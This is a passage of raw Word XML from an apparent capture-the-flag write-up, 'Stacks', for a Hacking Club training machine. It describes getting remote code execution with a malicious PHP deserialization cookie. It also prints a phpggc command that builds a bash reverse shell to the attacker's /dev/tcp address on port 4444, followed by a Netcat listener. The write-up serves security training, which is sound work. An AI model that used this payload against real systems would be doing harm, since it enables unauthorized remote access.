        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>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B6">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After creating the payload, we send it via the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>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B8">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781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2781300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>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BA">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After sending the malicious cookie, we achieve </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Inspecting the page source confirms that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command was executed and listed the system files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>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BC">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3708400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3708400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>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BE">
      <w:pPr>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BF">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Now that we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will create a reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>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C1">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1689100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1689100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>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C3">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./phpggc monolog/rce1 system "/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'" -b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>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C5">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Open a Netcat listener to receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>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C7">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425700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2425700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>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C9">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Send the malicious cookie again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>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CB">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1651000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1651000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we get a shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">
      <w:pPr>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CD">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527300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2527300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>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CF">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Navigating to /, we find our fourth and final flag.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5041900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5041900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId35" w:type="default"/>
      <w:headerReference r:id="rId36" w:type="first"/>
      <w:headerReference r:id="rId37" w:type="even"/>
      <w:footerReference r:id="rId38" w:type="default"/>
      <w:footerReference r:id="rId39" w:type="first"/>
      <w:footerReference r:id="rId40" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold">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8">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 Hacking Club | All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                          Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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9">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A">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2">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="4"/>
    <w:bookmarkEnd w:id="4"/>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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="71" name="image25.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image25.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image20.png"/>
        </v:shape>
      </w:pic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6">
    <w:pPr>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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="50" name="image4.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:cNvPr id="2" name="Shape 2"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
                          <w:pPr>
                            <w:spacing w:after="120" w:before="480" w:line="275.9999942779541"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Stacks</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr"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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name="image28.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image28.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3005191"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateContent>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7">
    <w:pPr>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4252"/>
        <w:tab w:val="right" w:leader="none" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image20.png"/>
        </v:shape>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Normal" w:default="1">
    <w:name w:val="normal"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableNormal" w:default="1">
    <w:name w:val="Table Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="320" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>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footer" Target="footer3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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5.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/phpggc/tree/master/gadgetchains" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/6" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId38" 